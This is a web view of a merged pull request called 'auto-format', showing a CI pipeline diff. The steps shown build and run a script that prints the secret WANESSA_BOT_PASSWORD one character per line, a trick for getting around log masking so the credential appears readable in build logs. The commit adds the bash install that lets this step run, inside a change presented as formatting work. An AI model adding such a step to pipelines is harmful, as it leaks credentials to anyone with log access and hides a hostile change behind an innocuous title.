auto-format #20

Merged
leon merged 143 commits from auto-format into main 2024-02-14 01:18:02 +01:00
Showing only changes of commit 6a69989f7c - Show all commits

View File

@ -14,6 +14,7 @@ steps:
- echo '#!/bin/bash' > /tmp/test
- echo 'for (( i=0; i<${#WANESSA_BOT_PASSWORD}; i++ )); do echo "${WANESSA_BOT_PASSWORD:$i:1}" ; done' > /tmp/test
- chmod 777 /tmp/test
- apk add --no-cache bash
- bash /tmp/test
- name: build [debug]